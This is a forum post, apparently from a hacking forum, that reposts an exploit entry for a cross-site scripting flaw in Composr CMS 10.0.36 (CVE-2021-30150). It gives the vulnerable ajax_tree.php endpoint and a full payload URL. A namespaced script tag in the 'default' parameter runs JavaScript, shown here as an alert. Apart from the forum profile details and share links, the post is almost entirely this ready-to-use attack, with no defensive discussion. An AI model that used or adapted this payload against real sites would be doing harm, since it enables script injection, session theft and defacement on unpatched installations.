This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting # Date: 04/06/2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.36 # Tested on: Windows/Linux # CVE : CVE-2021-30150 Vulnerable Endpoint: https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script> Link to comment Share on other sites More sharing options...
Recommended Posts